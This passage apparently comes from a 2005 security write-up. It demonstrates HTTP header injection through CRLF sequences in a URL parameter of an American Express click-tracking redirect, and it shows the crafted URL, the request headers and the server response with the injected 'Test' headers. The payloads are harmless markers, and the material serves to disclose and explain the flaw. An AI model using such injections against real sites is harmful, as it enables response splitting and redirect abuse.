
Location: http://www.americanexpress.com/
Test: XX
Content-Language: en
Connection: close
We see that an injection has occurred, because it injected our Text: XX,but
can we inject any more?
[Our URL]
http://www65.americanexpress.com/clicktrk/Tracking?url=%0d%0aTest:%20XX%0d%0
aTest:%20XXX
[Client Request Headers]
GET /clicktrk/Tracking?url=%0d%0aTest:%20XX%0d%0aTest:%20XXX HTTP/1.1
Host: www65.americanexpress.com
[Server Response Headers]
HTTP/1.x 302 OK
Server: Netscape-Enterprise/3.6 SP3
Date: Fri, 17 Jun 2005 15:10:02 GMT
Content-Type: text/html
Location: http://www.americanexpress.com/
Test: XX, XXX
Content-Language: en
Connection: close
Interesting result—this ...